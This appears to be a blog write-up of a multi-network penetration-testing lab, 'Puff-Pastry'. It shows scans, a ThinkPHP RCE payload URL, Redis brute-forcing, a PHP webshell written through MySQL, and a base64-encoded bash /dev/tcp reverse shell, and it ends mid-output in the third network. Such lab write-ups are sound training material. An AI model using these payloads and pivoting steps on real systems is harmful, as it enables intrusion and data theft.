{"id":1117,"date":"2025-06-07T02:05:00","date_gmt":"2025-06-06T18:05:00","guid":{"rendered":"http:\/\/xiyu12.top\/?p=1117"},"modified":"2025-06-07T02:05:00","modified_gmt":"2025-06-06T18:05:00","slug":"puff-pastry","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=1117","title":{"rendered":"Puff-Pastry"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">First internal network<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">start<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ sudo nmap -p- 10.10.110.129\n&#91;sudo] password for kali: \nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-06 00:14 EDT\nNmap scan report for 10.10.110.129\nHost is up (0.00059s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT     STATE SERVICE\n22\/tcp   open  ssh\n8080\/tcp open  http-proxy\nMAC Address: 00:0C:29:AD:96:36 (VMware)\n\nNmap done: 1 IP address (1 host up) scanned in 14.42 seconds\n\n\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ sudo nmap -sCV -p 8080 10.10.110.129\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-06 00:15 EDT\nNmap scan report for 10.10.110.129\nHost is up (0.00029s latency).\n\nPORT     STATE SERVICE VERSION\n8080\/tcp open  http    Apache Tomcat (language: en)\n|_http-trane-info: Problem with XML parsing of \/evox\/about\n|_http-open-proxy: Proxy might be redirecting requests\n| http-title: Login Page\n|_Requested resource was http:\/\/10.10.110.129:8080\/login;jsessionid=89E28918C6DCEBA8F57F90D982BBD458\nMAC Address: 00:0C:29:AD:96:36 (VMware)\n\nService detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 24.86 seconds<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">shiro rce<\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-114814-1024x572.png\" alt=\"\" class=\"wp-image-1119\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Reverse shell<\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-114850-1024x551.png\" alt=\"\" class=\"wp-image-1121\"\/><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>rlwrap nc -lvnp 8888\nlistening on &#91;any] 8888 ...\nconnect to &#91;10.10.110.128] from (UNKNOWN) &#91;10.10.110.129] 59594\nbash: cannot set terminal process group (1): Inappropriate ioctl for device\nbash: no job control in this shell\nroot@3dd344b922b1:\/# <\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Download tools chisel + fscan + busybox to kali (attack)<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">proxychains wget https:\/\/github.com\/shadow1ng\/fscan\/releases\/download\/1.8.4\/fscan<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">proxychains wget https:\/\/github.com\/jpillora\/chisel\/releases\/download\/v1.10.1\/chisel_1.10.1_linux_amd64.gz<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">proxychains wget https:\/\/busybox.net\/downloads\/binaries\/1.35.0-x86_64-linux-musl\/busybox<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Transfer files<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ python3 -m http.server                                                        \nServing HTTP on 0.0.0.0 port 8000 (http:\/\/0.0.0.0:8000\/) ...<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>root@3dd344b922b1:\/tmp# wget http:\/\/10.10.110.128:8000\/fscan\n\nroot@3dd344b922b1:\/tmp# wget http:\/\/10.10.110.128:8000\/chisel\n\nroot@3dd344b922b1:\/# wget http:\/\/10.10.110.128:8000\/busybox\n\n\nroot@3dd344b922b1:\/tmp# chmod +x chisel\n\n\u3002\u3002\u3002\u3002\u3002\u3002<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Information gathering<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Already root, so no privilege escalation is needed<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Network information<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>root@3dd344b922b1:\/tmp# route -n\nroute -n\nKernel IP routing table\nDestination     Gateway         Genmask         Flags Metric Ref    Use 
Iface\n0.0.0.0         192.168.100.1   0.0.0.0         UG    0      0        0 eth0\n192.168.100.0   0.0.0.0         255.255.255.0   U     0      0        0 eth0<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>root@3dd344b922b1:\/tmp# ifconfig\nifconfig\neth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500\n        inet 192.168.100.2  netmask 255.255.255.0  broadcast 192.168.100.255\n        ether 02:42:c0:a8:64:02  txqueuelen 0  (Ethernet)\n        RX packets 1037  bytes 16579223 (15.8 MiB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 840  bytes 112183 (109.5 KiB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n\nlo: flags=73&lt;UP,LOOPBACK,RUNNING&gt;  mtu 65536\n        inet 127.0.0.1  netmask 255.0.0.0\n        loop  txqueuelen 1000  (Local Loopback)\n        RX packets 0  bytes 0 (0.0 B)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 0  bytes 0 (0.0 B)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n\nroot@3dd344b922b1:\/tmp# \/busybox netstat -nltp\n\/busybox netstat -nltp\nActive Internet connections (only servers)\nProto Recv-Q Send-Q Local Address           Foreign Address         State       PID\/Program name    \ntcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      1\/java\ntcp        0      0 127.0.0.11:45031        0.0.0.0:*               LISTEN      -<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>root@3dd344b922b1:\/# .\/busybox traceroute 10.10.110.128\n.\/busybox traceroute 10.10.110.128\ntraceroute to 10.10.110.128 (10.10.110.128), 30 hops max, 46 byte packets\n 1  192.168.100.1 (192.168.100.1)  0.006 ms  0.008 ms  0.005 ms\n 2  10.10.110.128 (10.10.110.128)  0.219 ms  0.177 ms  0.106 ms<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>root@3dd344b922b1:\/# .\/busybox ping -c 5 www.baidu.com\n.\/busybox ping -c 5 www.baidu.com\n\nPING www.baidu.com (39.156.70.239): 56 data bytes\n64 bytes 
from 39.156.70.239: seq=0 ttl=127 time=67.891 ms\n64 bytes from 39.156.70.239: seq=1 ttl=127 time=65.083 ms\n64 bytes from 39.156.70.239: seq=2 ttl=127 time=70.176 ms\n64 bytes from 39.156.70.239: seq=3 ttl=127 time=64.000 ms\n64 bytes from 39.156.70.239: seq=4 ttl=127 time=78.336 ms<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Lateral movement<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>root@3dd344b922b1:\/tmp# .\/fscan -h 192.168.100.1-255\n.\/fscan -h 192.168.100.1-255\n\n   ___                              _    \n  \/ _ \\     ___  ___ _ __ __ _  ___| | __ \n \/ \/_\\\/____\/ __|\/ __| '__\/ _` |\/ __| |\/ \/\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__|   &lt;    \n\\____\/     |___\/\\___|_|  \\__,_|\\___|_|\\_\\   \n                     fscan version: 1.8.4\nstart infoscan\n(icmp) Target 192.168.100.1   is alive\n(icmp) Target 192.168.100.2   is alive\n(icmp) Target 192.168.100.3   is alive\n&#91;*] Icmp alive hosts len is: 3\n192.168.100.3:80 open\n192.168.100.1:22 open\n192.168.100.1:8080 open\n192.168.100.2:8080 open\n192.168.100.3:9000 open<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">192.168.100.3:80 open<br>192.168.100.3:9000 open<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;+] FCGI 192.168.100.3:9000 \nStatus: 403 Forbidden\nX-Powered-By: PHP\/7.3.33\nContent-type: text\/html; charset=UTF-8\nAccess denied.\nstderr:Access to the script '\/etc\/issue' has been denied (see security.limit_extensions)\nplesa try other path,as -path \/www\/wwwroot\/index.php\n\n\n&#91;*] WebTitle http:\/\/192.168.100.3      code:200 len:931    title:None\n&#91;+] PocScan http:\/\/192.168.100.3 poc-yaml-php-cgi-cve-2012-1823 \n&#91;+] PocScan http:\/\/192.168.100.3 poc-yaml-thinkphp5-controller-rce <\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">chisel port forwarding<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ .\/chisel server -p 10130 -reverse\n2025\/06\/06 
01:00:48 server: Reverse tunnelling enabled\n2025\/06\/06 01:00:48 server: Fingerprint kRRCqCsHRJTNpAh3Gn1uejwAC32xjSKcYXdD0kQCidE=\n2025\/06\/06 01:00:48 server: Listening on http:\/\/0.0.0.0:10130<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>root@3dd344b922b1:\/tmp# .\/chisel client 10.10.110.128:10130 R:10800:192.168.100.3:80&amp;\n&lt;lient 10.10.110.128:10130 R:10800:192.168.100.3:80&amp;\n&#91;1] 102\nroot@3dd344b922b1:\/tmp# 2025\/06\/06 05:03:00 client: Connecting to ws:\/\/10.10.110.128:10130\n2025\/06\/06 05:03:00 client: Connected (Latency 699.267\u00b5s)\n\n\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ .\/chisel server -p 10130 -reverse\n2025\/06\/06 01:00:48 server: Reverse tunnelling enabled\n2025\/06\/06 01:00:48 server: Fingerprint kRRCqCsHRJTNpAh3Gn1uejwAC32xjSKcYXdD0kQCidE=\n2025\/06\/06 01:00:48 server: Listening on http:\/\/0.0.0.0:10130\n2025\/06\/06 01:03:01 server: session#1: tun: proxy#R:10800=&gt;192.168.100.3:80: Listening<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">thinkphp rce<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">[+] ThinkPHP 5.0.22\/5.1.29 RCE exists<br><code>Payload: http:\/\/10.10.110.128:10800\/?s=\/index\/\\think\\app\/invokefunction&amp;function=call_user_func_array&amp;vars[0]=phpinfo&amp;vars[1][]=-1<\/code><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-130610-1024x555.png\" alt=\"\" class=\"wp-image-1122\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Reverse shell<\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-130807-1024x339.png\" alt=\"\" class=\"wp-image-1123\"\/><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ rlwrap nc -lvnp 8888\nlistening on &#91;any] 8888 ...\nconnect to &#91;10.10.110.128] from (UNKNOWN) &#91;10.10.110.129] 46990\nbash: cannot set terminal process group (9): Not a tty\nbash: no job control in this shell\nbash-5.1$ id\nid\nuid=82(www-data) gid=82(www-data) groups=82(www-data),82(www-data)\nbash-5.1$ <\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Second internal network<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Information gathering<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">www-data, so privilege escalation may be needed<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Network information<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>bash-5.1$ 
ip a\nip a\n1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN qlen 1000\n    link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\/8 scope host lo\n       valid_lft forever preferred_lft forever\n33: eth1@if34: &lt;BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN&gt; mtu 1500 qdisc noqueue state UP \n    link\/ether 02:42:0a:55:65:02 brd ff:ff:ff:ff:ff:ff\n    inet 10.85.101.2\/24 brd 10.85.101.255 scope global eth1\n       valid_lft forever preferred_lft forever\n35: eth0@if36: &lt;BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN&gt; mtu 1500 qdisc noqueue state UP \n    link\/ether 02:42:c0:a8:64:03 brd ff:ff:ff:ff:ff:ff\n    inet 192.168.100.3\/24 brd 192.168.100.255 scope global eth0\n       valid_lft forever preferred_lft forever\n\n\nbash-5.1$ netstat -nltp\nnetstat -nltp\n(Not all processes could be identified, non-owned process info\n will not be shown, you would have to be root to see it all.)\nActive Internet connections (only servers)\nProto Recv-Q Send-Q Local Address           Foreign Address         State       PID\/Program name    \ntcp        0      0 127.0.0.11:33699        0.0.0.0:*               LISTEN      -                   \ntcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   \ntcp6       0      0 :::9000                 :::*                    LISTEN      20\/sh  <\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>bash-5.1$ route -n\nroute -n\nKernel IP routing table\nDestination     Gateway         Genmask         Flags Metric Ref    Use Iface\n0.0.0.0         192.168.100.1   0.0.0.0         UG    0      0        0 eth0\n10.85.101.0     0.0.0.0         255.255.255.0   U     0      0        0 eth1\n192.168.100.0   0.0.0.0         255.255.255.0   U     0      0        0 eth0<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Lateral movement<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>bash-5.1$ .\/fscan -h 10.85.101.1-255\n.\/fscan -h 
10.85.101.1-255\n\n   ___                              _    \n  \/ _ \\     ___  ___ _ __ __ _  ___| | __ \n \/ \/_\\\/____\/ __|\/ __| '__\/ _` |\/ __| |\/ \/\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__|   &lt;    \n\\____\/     |___\/\\___|_|  \\__,_|\\___|_|\\_\\   \n                     fscan version: 1.8.4\nstart infoscan\ntrying RunIcmp2\nThe current user permissions unable to send icmp packets\nstart ping\n(icmp) Target 10.85.101.4     is alive\n(icmp) Target 10.85.101.3     is alive\n(icmp) Target 10.85.101.2     is alive\n(icmp) Target 10.85.101.1     is alive\n\n10.85.101.4:6379 open\n10.85.101.2:9000 open\n10.85.101.3:9000 open\n10.85.101.2:80 open\n10.85.101.3:80 open\n10.85.101.1:22 open<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">10.85.101.4:6379 open<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">10.85.101.3:9000 open<br>10.85.101.3:80 open<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;*] WebTitle http:\/\/10.85.101.3        code:200 len:19519  title:phpMyAdmin\n&#91;+] InfoScan http:\/\/10.85.101.3        &#91;phpMyAdmin] \n&#91;+] PocScan http:\/\/10.85.101.3 poc-yaml-php-cgi-cve-2012-1823 \n\n10.85.101.4:6379 open   redis<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">socks proxy<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>bash-5.1$ .\/chisel client 10.10.110.128:10130 R:1080:socks&amp;\n.\/chisel client 10.10.110.128:10130 R:1080:socks&amp;\n&#91;1] 625\nbash-5.1$ 2025\/06\/06 06:16:13 client: Connecting to ws:\/\/10.10.110.128:10130\n2025\/06\/06 06:16:13 client: Connected (Latency 508.598\u00b5s)\n\n\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ .\/chisel server -p 10130 -reverse\n2025\/06\/06 01:00:48 server: Reverse tunnelling enabled\n2025\/06\/06 01:00:48 server: Fingerprint kRRCqCsHRJTNpAh3Gn1uejwAC32xjSKcYXdD0kQCidE=\n2025\/06\/06 01:00:48 server: Listening on http:\/\/0.0.0.0:10130\n2025\/06\/06 01:03:01 server: session#1: tun: proxy#R:10800=&gt;192.168.100.3:80: Listening\n2025\/06\/06 
02:16:14 server: session#2: tun: proxy#R:127.0.0.1:1080=&gt;socks: Listening<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Point the proxychains configuration file \/etc\/proxychains4.conf at the proxy.<br>In R:1080:socks&amp; the bind address 127.0.0.1 is omitted by default.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;ProxyList]\n\n# add proxy here ...\n\n# meanwile\n\n# defaults set to \"tor\"\n\n#http 10.10.110.1 7890\n\nsocks5 127.0.0.1 1080<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains whatweb http:\/\/10.85.101.3                                                                    \n&#91;proxychains] config file found: \/etc\/proxychains4.conf\n&#91;proxychains] preloading \/usr\/lib\/x86_64-linux-gnu\/libproxychains.so.4\n&#91;proxychains] DLL init: proxychains-ng 4.17\n&#91;proxychains] DLL init: proxychains-ng 4.17\n&#91;proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.85.101.3:80  ...  OK\nhttp:\/\/10.85.101.3 &#91;200 OK] Bootstrap, Content-Security-Policy&#91;default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data:  *.tile.openstreetmap.org;object-src 'none';,default-src 'self' ;script-src 'self'  'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data:  *.tile.openstreetmap.org;object-src 'none';], Cookies&#91;phpMyAdmin,pma_lang], Country&#91;RESERVED]&#91;ZZ], HTML5, HTTPServer&#91;nginx\/1.26.3], HttpOnly&#91;phpMyAdmin,pma_lang], IP&#91;10.85.101.3], JQuery, PHP&#91;8.2.27], PasswordField&#91;pma_password], Script&#91;text\/javascript], Title&#91;phpMyAdmin], UncommonHeaders&#91;x-ob_mode,referrer-policy,content-security-policy,x-content-security-policy,x-webkit-csp,x-content-type-options,x-permitted-cross-domain-policies,x-robots-tag], X-Frame-Options&#91;DENY], X-Powered-By&#91;PHP\/8.2.27], X-XSS-Protection&#91;1; mode=block], nginx&#91;1.26.3], phpMyAdmin<\/code><\/pre>\n\n\n\n<h2 
class=\"wp-block-heading\">redis weak password<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains hydra -P \/usr\/share\/wordlists\/rockyou.txt redis:\/\/10.85.101.3:6379 <\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains  redis-cli -h 10.85.101.3 -p 6379 -a 12345                       \n&#91;proxychains] config file found: \/etc\/proxychains4.conf\n&#91;proxychains] preloading \/usr\/lib\/x86_64-linux-gnu\/libproxychains.so.4\n&#91;proxychains] DLL init: proxychains-ng 4.17\nWarning: Using a password with '-a' or '-u' option on the command line interface may not be safe.\n&#91;proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.85.101.3:6379  ...  OK\n10.85.101.3:6379&gt; KEYS *\n(empty array)\n10.85.101.3:6379&gt; <\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>xiyu@xiyu-virtual-machine:~\/\u684c\u9762\/Puff-Pastry\/db-redis$ cat docker-entrypoint.sh\n#!\/bin\/sh\n\nrm -f \/docker-entrypoint.sh\n\nredis-server --save 20 1 --loglevel warning --requirepass 12345\n\nredis-cli -a 12345 SET flag \"$(cat \/flag.txt)\"xiyu@xiyu-virtual-machine:~\/\u684c\u9762\/Puff-Pastry\/db-redis$ <\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Probably this file was never executed; run it manually.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code> proxychains  redis-cli -h 10.85.101.3 -p 6379 -a 12345                       \n&#91;proxychains] config file found: \/etc\/proxychains4.conf\n&#91;proxychains] preloading \/usr\/lib\/x86_64-linux-gnu\/libproxychains.so.4\n&#91;proxychains] DLL init: proxychains-ng 4.17\nWarning: Using a password with '-a' or '-u' option on the command line interface may not be safe.\n&#91;proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.85.101.3:6379  ...  
OK\n10.85.101.3:6379&gt; KEYS *\n(empty array)\n10.85.101.3:6379&gt; KEYS *\n1) \"flag\"\n10.85.101.3:6379&gt; get flag\n\"WSS-Studio{Redis-870ed89a-6658-4350-8d17-9f293df5c6b1}\"\n10.85.101.3:6379&gt; <\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">phpmyadmin weak password<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Set up the socks5 proxy<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img decoding=\"async\" src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-185950.png\" alt=\"\" class=\"wp-image-1125\" style=\"width:307px;height:auto\"\/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">root:root<br>Logging in directly gives an error; after clearing cookies and revisiting, the admin panel can be reached.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-185653-1024x477.png\" alt=\"\" class=\"wp-image-1124\"\/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Write a webshell via mysql to get a reverse shell<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Check write permission: show global variables like '%secure%';<\/li>\n\n\n\n<li>Determine the web root: \/var\/www\/html (a common web path)<\/li>\n\n\n\n<li>select '' into outfile '\/var\/www\/html\/shell.php'<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-191141-1024x915.png\" alt=\"\" class=\"wp-image-1126\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Writing a webshell via the mysql log<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>show variables like '%general%';<\/code><\/pre>\n\n\n\n<p 
class=\"wp-block-paragraph\">1edbc9114efc.log<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>set global general_log = on; \nset global general_log_file =\"\/var\/www\/html\/shell.php\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Neither method worked. After looking through the container, the permissions were insufficient, but one tmp directory had the required permissions.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-193756.png\" alt=\"\" class=\"wp-image-1127\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-193939-1024x394.png\" alt=\"\" class=\"wp-image-1128\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Get a reverse shell from the webshell<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains  curl -X POST -d \"shell=system('id');\" http:\/\/10.85.101.3\/tmp\/shell.php\n&#91;proxychains] config file found: \/etc\/proxychains4.conf\n&#91;proxychains] preloading \/usr\/lib\/x86_64-linux-gnu\/libproxychains.so.4\n&#91;proxychains] DLL init: proxychains-ng 4.17\n&#91;proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.85.101.3:80  ...  OK\nuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Set up port forwarding<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Listen on tp's port 8888 for the php reverse shell; the client and server then communicate, and the server forwards to its own port 8888, i.e. the kali host.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Here the server acts as a forward proxy: it handles the forwarded outbound traffic and returns the reply traffic along the same path.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">8888:0.0.0.0:8888<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>bash-5.1$ .\/chisel client 10.10.110.128:10130 8888:0.0.0.0:8888&amp;\n.\/chisel client 10.10.110.128:10130 8888:0.0.0.0:8888&amp;\n&#91;2] 640\nbash-5.1$ 2025\/06\/06 13:59:37 client: Connecting to ws:\/\/10.10.110.128:10130\n2025\/06\/06 13:59:38 client: tun: proxy#8888=&gt;0.0.0.0:8888: Listening\n2025\/06\/06 13:59:38 client: Connected (Latency 1.022047ms)\n\n\nbash-5.1$ netstat 
-nltp\nnetstat -nltp\n(Not all processes could be identified, non-owned process info\n will not be shown, you would have to be root to see it all.)\nActive Internet connections (only servers)\nProto Recv-Q Send-Q Local Address           Foreign Address         State       PID\/Program name    \ntcp        0      0 127.0.0.11:33699        0.0.0.0:*               LISTEN      -                   \ntcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   \ntcp6       0      0 :::8888                 :::*                    LISTEN      640\/.\/chisel        \ntcp6       0      0 :::9000                 :::*                    LISTEN      20\/sh  <\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Reverse shell<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\/bin\/bash -i &gt;&amp; \/dev\/tcp\/10.85.101.2\/8888 0&gt;&amp;1<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code> proxychains  curl -X POST -d \"shell=system('echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjg1LjEwMS4yLzg4ODggMD4mMQ== | base64 -d | bash');\" http:\/\/10.85.101.3\/tmp\/shell.php\n&#91;proxychains] config file found: \/etc\/proxychains4.conf\n&#91;proxychains] preloading \/usr\/lib\/x86_64-linux-gnu\/libproxychains.so.4\n&#91;proxychains] DLL init: proxychains-ng 4.17\n&#91;proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.85.101.3:80  ...  
OK\n&lt;html&gt;\n&lt;head&gt;&lt;title&gt;504 Gateway Time-out&lt;\/title&gt;&lt;\/head&gt;\n&lt;body&gt;\n&lt;center&gt;&lt;h1&gt;504 Gateway Time-out&lt;\/h1&gt;&lt;\/center&gt;\n&lt;hr&gt;&lt;center&gt;nginx\/1.26.3&lt;\/center&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;\n\n\n\nrlwrap nc -lvnp 8888\nlistening on &#91;any] 8888 ...\nconnect to &#91;127.0.0.1] from (UNKNOWN) &#91;127.0.0.1] 36140\nbash: cannot set terminal process group (142): Not a tty\nbash: no job control in this shell\n1edbc9114efc:\/var\/www\/html\/tmp# id\nid\nuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)\n1edbc9114efc:\/var\/www\/html\/tmp# <\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Transfer files<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">phpadmin on the 10.85.101.0 segment has no outbound network access<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Connect to the webshell with AntSword (\u8681\u5251) and upload the files<\/li>\n\n\n\n<li>Transfer the files to tp 192.168.100.2 and start a simple python server<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>bash-5.1$ python3 -m http.server&amp;<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Third internal network<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Information gathering<\/h3>\n\n\n\n<h2 class=\"wp-block-heading\">Network information<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>3d746bf3ad56:\/tmp# ip a\nip a\n1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN qlen 1000\n    link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\/8 scope host lo\n       valid_lft forever preferred_lft forever\n29: eth0@if30: &lt;BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN&gt; mtu 1500 qdisc noqueue state UP \n    link\/ether 02:42:0a:55:65:04 brd ff:ff:ff:ff:ff:ff\n    inet 10.85.101.4\/24 brd 10.85.101.255 scope global eth0\n       valid_lft forever preferred_lft 
